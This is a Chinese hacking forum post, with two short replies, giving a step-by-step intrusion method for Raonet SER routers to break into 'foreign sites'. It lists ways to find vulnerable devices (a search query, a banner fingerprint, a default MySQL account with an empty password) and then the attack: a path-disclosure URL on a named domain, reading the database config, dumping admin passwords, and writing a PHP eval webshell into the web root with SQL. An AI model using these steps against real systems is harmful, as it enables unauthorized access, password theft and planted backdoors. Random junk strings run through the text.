找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2837|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:+ E8 H' }0 e. L" s/ V
2 ]$ Z$ r# A8 J
1:google搜索'Raonet Subscriber Ethernet Router'
! p% ^; F; t, S) E" T7 d1 k: W; P! U  h$ Z% D
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20016 s1 n9 u! `& t9 w

/ ~4 [6 s( e' C2 N9 u& j3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
1 Y+ w* ^& N4 U% [  U6 t+ H" p. q
, [3 w" h1 U) D* D. K//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
9 K. R6 S2 W. J* j& u4 O& P
4 ^/ h+ i/ L; `% W7 q) G
& Y9 f2 K, m5 `9 i% T0 E
/ }3 L1 [1 F3 M( }' D* ~: s+ s( ^入侵步骤:! s: x, p. t0 n# j; C; K! W
; H- ^2 M: w7 D. r1 }5 K2 M$ \
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; a+ _. \/ w( a; V4 P2 e

. l- |7 r! H! o2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 w" ?! ?& y1 J# @
3:得到密码后连接,查看GUI管理密码:
3 e8 r) Z, w) `7 h, o  V3 N5 Vuse ser_5008 g0 d# E7 B. A/ D
select id,passwd from user;( }; t; x& G8 E! L6 E: |
4:通过数据库写入webshell,执行命令:
3 o7 X) t2 w6 q& f) {use mysql;  ^* f+ V7 z' V
create table ok(cmd TEXT);
) p8 r% d; l8 A. D8 Kinsert into ok values("<?php @eval($_POST[cmd])?>");
0 u- r0 T, W+ h% v/ L$ m4 ~select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: @0 c/ r/ c% d% _5 L9 Jdrop table ok;
0 q7 v1 _2 {8 w  f+ M% ^) ?; r5 ]- x9 l
7 W' B, ^4 C# E# Z# d  W: @5:连接后门shell.php * b% B- M% S. q% k0 P/ a+ A/ j7 P

1 I6 A1 j. O& U: H6. 搞定!
" {. `. E- h9 t& z4 Q+ f& K5 I% q# M9 B: j8 t1 L
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表